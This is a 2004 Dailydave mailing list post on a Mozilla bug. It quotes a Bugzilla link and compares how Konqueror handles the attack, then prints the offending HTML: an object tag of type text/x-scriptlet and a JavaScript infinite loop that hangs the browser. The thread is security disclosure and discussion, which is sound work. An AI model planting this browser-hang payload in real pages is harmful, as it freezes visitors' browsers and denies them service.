Dailydave mailing list archives

Re: Mozilla bug might even get fixed!


From: Mordy Ovits <movits () bloomberg com>
Date: Fri, 14 May 2004 11:10:09 -0400

On Friday 14 May 2004 10:57 am, Dave Aitel wrote:
> Someone sent me this...
>
> http://bugzilla.mozilla.org/show_bug.cgi?id=243540
>
> I'm not sure how they managed to capture the attack, since it was gone
> when I looked for it, but it does work. :>

Konqueror pops up a nifty dialog box warning and lets you kill the script:
http://www.ovits.org/konqsploit.png

Here's the questionable content in text/plain:
=====
<object id="test" data="#" width="100%" height="100%" type="text/x-scriptlet" 
VIEWASTEXT></object>

<form name="form"><input type="text" name="box"><form>

<script language="javascript">
while(true) { document.form.box.value=document.form.box.value + ' '; }
</script>
=====

Mordy
-- 
Mordy Ovits
Network Security
Bloomberg L.P.
